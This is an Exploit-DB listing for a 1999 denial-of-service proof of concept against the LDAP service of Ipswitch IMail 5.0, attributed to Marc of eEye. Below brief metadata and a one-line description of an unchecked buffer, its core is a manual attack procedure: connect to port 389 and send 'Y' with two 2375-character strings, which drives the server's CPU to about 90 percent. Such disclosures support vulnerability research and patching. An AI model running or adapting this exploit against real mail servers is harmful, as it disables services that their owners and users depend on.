Ipswitch IMail 5.0 - LDAP Buffer Overflow (Denial of Service) (PoC)

EDB-ID:

19378

CVE:


EDB Verified:

Author:

Marc of eEye

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

1999-03-01

Vulnerable App: 
source: https://www.securityfocus.com/bid/503/info

The IMail ldap service has an unchecked buffer, resulting in a classic buffer overflow vulnerability. While it does not crash the service, it drives CPU utilization up rendering the system essentially unusable.

Telnet to target machine, port 389
Send: Y glob1
hit enter twice
Server Returns: 0
Send: Y glob2
hit enter

Where glob1 and glob2 are 2375 characters and Y is Y. The ldap service goes to 90 percent or so and idles there. Therefore using up most system resources.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services